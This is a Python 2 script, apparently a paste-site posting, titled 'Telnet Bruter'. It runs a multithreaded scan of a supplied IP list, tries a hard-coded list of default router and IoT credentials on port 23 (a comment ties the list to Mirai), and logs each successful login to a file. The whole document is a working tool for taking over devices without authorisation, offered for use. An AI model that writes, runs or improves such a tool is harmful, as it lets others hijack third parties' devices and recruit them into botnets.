[ PYTHON ] Telnet Bruter (passes)

1. import threading
2. import sys, os, re, time, socket
3. from Queue import *
4. from sys import stdout
5.  
6. if len(sys.argv) < 4:
7.     print "Usage: python "+sys.argv[0]+" <list> <threads> <output file>"
8.     sys.exit()
9.  
10. combo = [
11.   "root:xc3511",
12.     "root:vizxv",
13.     "root:admin",
14.     "admin:admin",
15.     "root:888888",
16.     "root:xmhdipc",
17.     "root:default",
18.     "root:juantech",
19.     "root:123456",
20.     "root:54321",
21.     "support:support",
22.     "root:",
23.     "admin:password",
24.     "root:root",
25.     "root:12345",
26.     "user:user",
27.     "admin:",
28.     "root:pass",
29.     "admin:admin1234",
30.     "root:1111",
31.     "admin:smcadmin",
32.     "admin:1111",
33.     "root:666666",
34.     "root:password",
35.     "root:1234",
36.     "root:klv123",
37.     "Administrator:admin",
38.     "service:service",
39.     "supervisor:supervisor",
40.     "guest:guest",
41.     "guest:12345",
42.     "admin1:password",
43.     "administrator:1234",
44.     "666666:666666",
45.     "888888:888888",
46.     "ubnt:ubnt",
47.     "root:klv1234",
48.     "root:Zte521",
49.     "root:hi3518",
50.     "root:jvbzd",
51.     "root:anko",
52.     "root:zlxx.",
53.     "root:7ujMko0vizxv",
54.     "root:7ujMko0admin",
55.     "root:system",
56.     "root:ikwb",
57.     "root:dreambox",
58.     "root:user",
59.     "root:realtek",
60.     "root:00000000",
61.     "admin:1111111",
62.     "admin:1234",
63.     "admin:12345",
64.     "admin:54321",
65.     "admin:123456",
66.     "admin:7ujMko0admin",
67.     "admin:pass",
68.     "admin:meinsm",
69.     "tech:tech",
70.     "mother:fucker",
71.     "default:",
72.     "admin:ADMIN",
73.     "root:1234567",
74.     "supervisor:zyad1234",
75.     "daemon:",
76.     "adm:",
77.     "default:default",
78.     "root:696969",
79.     "Alphanetworks:wrgg19_c_dlwbr_dir300",
80.     "Alphanetworks:wrgn49_dlob_dir600b",
81.     "Alphanetworks:wrgn23_dlwbr_dir600b",
82.     "Alphanetworks:wrgn22_dlwbr_dir615",
83.     "Alphanetworks:wrgnd08_dlob_dir815",
84.     "Alphanetworks:wrgg15_di524",
85.     "Alphanetworks:wrgn39_dlob.hans_dir645",
86.     "Alphanetworks:wapnd03cm_dkbs_dap2555",
87.     "Alphanetworks:wapnd04cm_dkbs_dap3525",
88.     "Alphanetworks:wapnd15_dlob_dap1522b",
89.     "Alphanetworks:wrgac01_dlob.hans_dir865",
90.     "Alphanetworks:wrgn23_dlwbr_dir300b",
91.     "Alphanetworks:wrgn28_dlob_dir412",
92.     "Alphanetworks:wrgn39_dlob.hans_dir645_V1"
93. ]
94.  
95. ips = open(sys.argv[1], "r").readlines()
96. threads = int(sys.argv[2])
97. output_file = sys.argv[3]
98. queue = Queue()
99. queue_count = 0
100.  
101. for ip in ips:
102.     queue_count += 1
103.     stdout.write("\r[%d] Added to queue" % queue_count)
104.     stdout.flush()
105.     queue.put(ip)
106. print "\n"
107.  
108.  
109. class router(threading.Thread):
110.     def __init__ (self, ip):
111.         threading.Thread.__init__(self)
112.         self.ip = str(ip).rstrip('\n')
113.     def run(self):
114.         username = ""
115.         password = ""
116.         for passwd in combo:
117.             if ":n/a" in passwd:
118.                 password=""
119.             else:
120.                 password=passwd.split(":")[1]
121.             if "n/a:" in passwd:
122.                 username=""
123.             else:
124.                 username=passwd.split(":")[0]
125.             try:
126.                 tn = socket.socket()
127.                 tn.settimeout(8)
128.                 tn.connect((self.ip,23))
129.             except Exception:
130.                 tn.close()
131.                 break
132.             try:
133.                 hoho = ''
134.                 hoho += readUntil(tn, "ogin:")
135.                 if "ogin" in hoho:
136.                     tn.send(username + "\n")
137.                     time.sleep(0.09)
138.             except Exception:
139.                 tn.close()
140.             try:
141.                 hoho = ''
142.                 hoho += readUntil(tn, "assword:")
143.                 if "assword" in hoho:
144.                     tn.send(password + "\n")
145.                     time.sleep(0.8)
146.                 else:
147.                     pass
148.             except Exception:
149.                 tn.close()
150.             try:
151.                 prompt = ''
152.                 prompt += tn.recv(40960)
153.                 if ">" in prompt and "ONT" not in prompt:
154.                     success = True
155.                 elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
156.                     success = True             
157.                 else:
158.                     tn.close()
159.                 if success == True:
160.                     try:
161.                         os.system("echo "+self.ip+":23 "+username+":"+password+" >> "+output_file+"") # 1.1.1.1:23 user:pass # mirai
162.                         print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
163.                         tn.close()
164.                         break
165.                     except:
166.                         tn.close()
167.                 else:
168.                     tn.close()
169.             except Exception:
170.                 tn.close()
171.  
172. def readUntil(tn, string, timeout=8):
173.     buf = ''
174.     start_time = time.time()
175.     while time.time() - start_time < timeout:
176.         buf += tn.recv(1024)
177.         time.sleep(0.01)
178.         if string in buf: return buf
179.     raise Exception('TIMEOUT!')
180.  
181. def worker():
182.     try:
183.         while True:
184.             try:
185.                 IP = queue.get()
186.                 thread = router(IP)
187.                 thread.start()
188.                 queue.task_done()
189.                 time.sleep(0.02)
190.             except:
191.                 pass
192.     except:
193.         pass
194.  
195. for l in xrange(threads):
196.     try:
197.         t = threading.Thread(target=worker)
198.         t.start()
199.     except:
200.         pass